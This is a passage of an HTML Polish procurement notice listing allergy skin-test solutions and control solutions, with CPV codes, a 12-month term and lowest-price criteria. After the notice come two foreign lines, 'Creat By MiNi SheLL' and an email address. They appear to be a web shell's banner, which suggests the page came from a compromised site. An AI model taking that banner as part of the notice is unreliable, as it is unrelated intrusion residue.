12	Sierść kota	Roztwór do skórnych prób punktowych	1 zestaw butelka 3 ml + roztwór kontrolny dodatni + roztwór kontrolny ujemny	op	19.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Test śródskórny kontrola ujemna	roztwór do śródskórnych prób testowych	1 zestaw butelka  3ml	op	2
2	Test śródskórny kontrola dodatnia	roztwór do śródskórnych prób testowych	1 zestaw butelka  3ml	op	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com